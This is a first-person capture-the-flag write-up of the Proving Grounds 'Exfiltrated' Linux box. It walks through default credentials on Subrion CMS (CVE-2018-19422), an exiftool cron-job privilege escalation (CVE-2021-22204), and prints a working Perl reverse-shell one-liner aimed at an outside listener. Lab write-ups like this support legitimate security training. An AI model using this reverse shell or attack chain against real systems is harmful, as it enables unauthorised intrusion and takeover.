Exfiltrated

Source: Proving Grounds OS: Linux Community Rating: Intermediate

Enumeration & Reconnaissance

  • I started off with autorecon, which revealed two open ports on the target:

    • SSH (22)

    • HTTP (80)

Service Analysis

  • After examining the HTTP service, the hostname http://exfiltrated.offsec appeared, so I updated my /etc/hosts to properly resolve it.

  • I checked for the robots.txt and that easy, it unveiled several hidden directories. One of these directories led me to an admin login page for Subrion CMS v4.2.1.

robots.txt
Subrion CMS

Gaining Initial Access

  • A quick web search confirmed that this version is affected by CVE-2018-19422. However, to take advantage of this vulnerability, valid credentials were necessary. I tried the default combination admin:admin, and it worked!

CVE-2018-19422
  • I obtained a shell, though it was quite terrible, pretty much a basic, non-interactive shell. My attempts to upgrade it to a fully interactive TTY shell were unsuccessful until I tried a Perl one-liner. Running the following command finally gave me a usable shell (The shell was generated using revshells.com):

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.217:9001");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Privilege Escalation

  • Once I had a reliable shell, I ran linpeas.sh to scout for further vulnerabilities. The scan pointed out that the target was vulnerable to CVE-2021-4034, the notorious Polkit exploit that had given me so much trouble on the previous machine. I didn't want to try this route again.

  • I checked the cron jobs and was pleased to discover one scheduled to run every minute. The cron job executed a script that used exiftool on uploaded files, appending the data to the logs.

The Cron Job Script
  • A bit of online research revealed that exiftool is vulnerable to CVE-2021-22204. I found a github PoC that created the payload, I crafted the payload image to exploit this vulnerability, moved it to the target, and waited for the cron job to pick it up. When the cron job executed my payload, I obtained root access.

CVE-2021-22204 Payload

Lessons Learned

  • Hidden Directories: A simple robots.txt file can uncover critical hidden paths.

  • Default Credentials: Sometimes, the most obvious username and password (admin:admin) can be all it takes to exploit a vulnerability.

  • Cron Job Exploitation: The insecure cron job the path to root.

Last updated